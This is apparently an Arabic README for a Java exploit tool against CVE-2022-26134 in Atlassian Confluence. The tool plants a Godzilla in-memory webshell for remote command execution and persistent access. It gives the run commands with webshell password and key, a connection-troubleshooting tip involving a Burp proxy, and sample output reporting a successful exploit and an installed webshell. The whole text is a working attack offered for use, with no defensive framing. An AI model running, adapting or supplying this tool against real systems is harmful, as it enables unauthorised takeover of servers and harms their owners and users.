
أداة استغلال تعتمد على Java تستهدف CVE-2022-26134، وتقوم بحقن شِل Godzilla الويب في خوادم Atlassian Confluence، مما يتيح تنفيذ الأوامر عن بُعد والوصول الدائم لصدفة الذاكرة.
java -jar CVE-2022-26134.jar كلمة_مرور_Godzilla مفتاح_Godzilla
مثال
java -jar CVE-2022-26134.jar pass key
إذا تم حقن شيل الذاكرة بنجاح ولكن Godzilla لم يتمكن من الاتصال، يرجى إضافة رأس البروتوكول التالي في تكوين الطلب أو تكوين وكيل Burp لـ Godzilla
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
